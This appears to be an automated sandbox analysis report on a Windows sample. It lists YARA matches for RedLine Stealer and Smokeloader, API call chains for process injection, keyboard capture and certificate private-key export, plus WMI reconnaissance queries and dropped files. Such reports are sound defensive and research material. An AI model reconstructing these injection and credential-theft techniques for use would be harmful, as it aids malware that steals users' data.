    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: Yara match | File source: 00000010.00000002.4123294336.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000012.00000002.4123114957.0000000000771000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5804, type: MEMORYSTR
    Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7524, type: MEMORYSTR
    Source: Yara match | File source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara match | File source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02EF162B GetKeyboardState,ToUnicode
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx

    System Summary

    Source: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: C:\Windows\explorer.exe | Process Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_004032C7 CreateFileW,GetForegroundWindow,NtEnumerateKey,wcsstr
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00403103 RtlCreateUserThread,NtTerminateProcess
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_004014FB LocalAlloc,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00401641 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00403257 RtlCreateUserThread,NtTerminateProcess
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00401606 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00401613 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00401627 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00403433 GetKeyboardLayoutList,OpenProcessToken,GetTokenInformation,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_004015FB VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00403103 RtlCreateUserThread,NtTerminateProcess
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_004014FB LocalAlloc,VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00401641 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00403257 RtlCreateUserThread,NtTerminateProcess
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00401606 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00401613 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_00401627 VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Users\user\AppData\Roaming\hdhruer | Code function: 8_2_004015FB VirtualProtect,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02754B92 RtlMoveMemory,NtUnmapViewOfSection
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_027533C3 NtQueryInformationFile
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_0275342B NtQueryObject,NtQueryObject,RtlMoveMemory
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_0275349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle
    Source: C:\Windows\explorer.exe | Code function: 15_2_00CD38B0 NtUnmapViewOfSection
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_00141016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_00141819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_00141A80 NtCreateSection,NtMapViewOfSection
    Source: C:\Windows\explorer.exe | Code function: 18_2_0077355C NtUnmapViewOfSection
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02EF1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02EF1B26 NtCreateSection,NtMapViewOfSection
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02EF18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle
    Source: C:\Windows\explorer.exe | Code function: 21_2_004D370C NtUnmapViewOfSection
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Code function: 6_2_00403433
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D69AC8
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D63220
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D6B428
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D6DC0C
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D6A778
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D6213C
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Code function: 9_2_00007FF6F2D6A520
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02752198
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_0275C2F9
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_0276B35C
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_027A4438
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_0276B97E
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02756E6A
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_02775F08
    Source: C:\Windows\explorer.exe | Code function: 15_2_00CD1E20
    Source: C:\Windows\explorer.exe | Code function: 18_2_00772860
    Source: C:\Windows\explorer.exe | Code function: 18_2_00772054
    Source: C:\Windows\explorer.exe | Code function: 21_2_004D20F4
    Source: C:\Windows\explorer.exe | Code function: 21_2_004D2A04
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\B972.exe B139090C797214F88A2EA451289AB670000936C413CD2CD45AAA9895C78C63B5
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: String function: 02758801 appears 38 times
    Source: ctMI3TYXpX.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000008.00000002.2574353685.00000000004A0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2327173692.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1726159167.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000008.00000002.2576258561.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2327201404.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.1977011876.0000000000581000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000005.00000002.1977659662.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2327352814.0000000000731000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.1726254840.00000000004F1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.1726176567.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.2576079643.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000005.00000002.1976888383.0000000000530000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1726400088.00000000021D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000008.00000002.2576150006.0000000001FB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.1976909715.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2327481392.0000000000771000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@79/14@8/4
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe; Code function: 0_2_00503919 CreateToolhelp32Snapshot,Module32First,0_2_00503919
    Source: C:\Users\user\AppData\Local\Temp\B972.exe; Code function: 9_2_00007FF6F2D67138 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,9_2_00007FF6F2D67138
    Source: C:\Windows\explorer.exe; File created: C:\Users\user\AppData\Roaming\jghruer
    Source: C:\Windows\explorer.exe; File created: C:\Users\user\AppData\Local\Temp\35DB.tmp
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\explorer.exe
    Source: ctMI3TYXpX.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\AppData\Local\Temp\B972.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Users\user\AppData\Local\Temp\B972.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Process
    Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, CommandLine, ExecutablePath, ProcessId FROM Win32_Process
    Source: C:\Windows\System32\systeminfo.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="324"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="408"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="484"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="492"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="552"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="620"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="628"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
